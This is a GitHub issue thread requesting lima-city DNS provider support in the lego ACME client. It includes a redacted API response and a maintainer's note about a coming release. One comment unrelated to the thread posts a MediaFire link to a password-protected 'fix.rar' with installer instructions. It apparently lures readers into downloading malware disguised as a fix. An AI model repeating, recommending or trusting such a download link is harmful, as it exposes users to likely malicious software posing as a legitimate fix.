### ISSUE TITLE
Support for provider: lima-city

### ISSUE THREAD

**Issue by feroxib** [go-acme/lego#2247]
### Welcome

- [X] Yes, I've searched similar issues on GitHub and didn't find any.
- [X] Yes, the DNS provider exposes a public API.
- [X] Yes, I know that the lego maintainers don't have an account in all DNS providers in the world.
- [ ] Yes, I'm able to create a pull request and be able to maintain the implementation.
- [X] Yes, I'm able to test an implementation if someone creates a pull request to add the support of this DNS provider.

### How do you use lego?

Through Caddy

### Link to the DNS provider

https://www.lima-city.de/

### Link to the API documentation

https://www.lima-city.de/hilfe/lima-city-api

### Additional Notes

implementation in acme.sh https://github.com/acmesh-official/acme.sh/blob/master/dnsapi/dns_limacity.sh

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by feroxib** [comment]
sure!
here you go

{"domains":[{"id":2*****,"mode":"CREATE","tld":"com","domain":"example","in_subscription":false,"auto_renew":false,"status":"ok","unicode_fqdn":"example.com","registered_at":"1970-01-01T00:00:00+00:00","registered_until":"2000-01-01T00:00:00+00:00","renew_price":00.01}]}

**Comment by feroxib** [comment]
im impatient and it sucks...
but i have to ask.

any idea on an release date?
since i would love to use lego in docker and if i understand correctly docker labels only exist for the released versions

**Comment by ldez** [comment]
I will finish the Mittwald implementation, and after the merge of this PR, I think we will create a release.
So in a few days (at least I hope :smile_cat:)
